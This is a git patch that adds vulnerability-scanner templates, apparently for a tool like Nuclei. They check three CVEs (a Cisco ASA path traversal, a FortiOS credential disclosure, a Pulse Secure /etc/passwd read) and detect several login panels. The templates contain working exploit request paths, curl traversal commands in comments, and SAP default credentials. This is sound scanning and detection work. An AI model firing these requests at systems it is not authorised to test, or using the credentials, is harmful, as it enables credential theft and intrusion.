From 413c126c296bf927224e3ff5516b1c6f63a0f64a Mon Sep 17 00:00:00 2001 From: organiccrap <376317+organiccrap@users.noreply.github.com> Date: Wed, 22 Apr 2020 14:42:01 +0800 Subject: [PATCH] pending pull --- cves/CVE-2018-0296.yaml | 22 ++++++++++++++++++++++ cves/CVE-2018-13379.yaml | 15 +++++++++++++++ cves/CVE-2019-11510.yaml | 20 ++++++++++++++++++++ files/firebase-detect.yaml | 17 +++++++++++++++++ panels/cisco-asa-panel.yaml | 16 ++++++++++++++++ panels/grafana-detect.yaml | 16 ++++++++++++++++ panels/sap-netweaver-detect.yaml | 17 +++++++++++++++++ panels/supervpn-panel.yaml | 16 ++++++++++++++++ 8 files changed, 139 insertions(+) create mode 100644 cves/CVE-2018-0296.yaml create mode 100644 cves/CVE-2018-13379.yaml create mode 100644 cves/CVE-2019-11510.yaml create mode 100644 files/firebase-detect.yaml create mode 100644 panels/cisco-asa-panel.yaml create mode 100644 panels/grafana-detect.yaml create mode 100644 panels/sap-netweaver-detect.yaml create mode 100644 panels/supervpn-panel.yaml diff --git a/cves/CVE-2018-0296.yaml b/cves/CVE-2018-0296.yaml new file mode 100644 index 0000000000..70ef80af89 --- /dev/null +++ b/cves/CVE-2018-0296.yaml @@ -0,0 +1,22 @@ +id: CVE-2018-0296 + +info: + name: Cisco ASA path traversal vulnerability + author: organiccrap + severity: medium + # https://github.com/yassineaboukir/CVE-2018-0296 + # curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions + # if vuln, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number + +requests: + - method: GET + path: + - "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" + matchers: + - type: word + words: + - "///sessions" + part: body + - type: status + status: + - 200 diff --git a/cves/CVE-2018-13379.yaml b/cves/CVE-2018-13379.yaml new file mode 100644 index 0000000000..8a8e5a0982 --- /dev/null +++ b/cves/CVE-2018-13379.yaml @@ -0,0 +1,15 @@ +id: CVE-2018-13379 + +info: + name: FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure + author: organiccrap + severity: high + +requests: + - method: GET + path: + - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" + matchers: + - type: word + words: + - "var fgt_lang =" diff --git a/cves/CVE-2019-11510.yaml b/cves/CVE-2019-11510.yaml new file mode 100644 index 0000000000..1db8007db7 --- /dev/null +++ b/cves/CVE-2019-11510.yaml @@ -0,0 +1,20 @@ +id: CVE-2019-11510 + +info: + name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability + author: organiccrap + severity: high + # https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html + +requests: + - method: GET + path: + - "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/" + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" + part: body diff --git a/files/firebase-detect.yaml b/files/firebase-detect.yaml new file mode 100644 index 0000000000..314fbfda28 --- /dev/null +++ b/files/firebase-detect.yaml @@ -0,0 +1,17 @@ +id: firebase-detect + +info: + name: firebase detect + author: organiccrap + severity: low + # http://ghostlulz.com/google-exposed-firebase-database/ + +requests: + - method: GET + path: + - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET" + matchers: + - type: word + words: + - "Could not parse auth token" + part: body diff --git a/panels/cisco-asa-panel.yaml b/panels/cisco-asa-panel.yaml new file mode 100644 index 0000000000..e60fd53fbf --- /dev/null +++ b/panels/cisco-asa-panel.yaml @@ -0,0 +1,16 @@ +id: cisco-asa-panel-detect + +info: + name: Cisco ASA VPN panel detect + author: organiccrap + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/+CSCOE+/logon.html" + matchers: + - type: word + words: + - "SSL VPN Service" + part: body diff --git a/panels/grafana-detect.yaml b/panels/grafana-detect.yaml new file mode 100644 index 0000000000..9f4b4e689a --- /dev/null +++ b/panels/grafana-detect.yaml @@ -0,0 +1,16 @@ +id: grafana-detect + +info: + name: Grafana panel detect + author: organiccrap + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + matchers: + - type: word + words: + - "Grafana" + part: body diff --git a/panels/sap-netweaver-detect.yaml b/panels/sap-netweaver-detect.yaml new file mode 100644 index 0000000000..d9a4d6c688 --- /dev/null +++ b/panels/sap-netweaver-detect.yaml @@ -0,0 +1,17 @@ +id: sap-netweaver-portal-detect + +info: + name: SAP NetWeaver Portal detect + author: organiccrap + severity: low + # SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2& + +requests: + - method: GET + path: + - "{{BaseURL}}/irj/portal" + matchers: + - type: word + words: + - "SAP NetWeaver Portal" + part: body diff --git a/panels/supervpn-panel.yaml b/panels/supervpn-panel.yaml new file mode 100644 index 0000000000..2124700c86 --- /dev/null +++ b/panels/supervpn-panel.yaml @@ -0,0 +1,16 @@ +id: supervpn-detect + +info: + name: SuperVPN panel detect + author: organiccrap + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/login.html" + matchers: + - type: word + words: + - "Sign In-SuperVPN" + part: body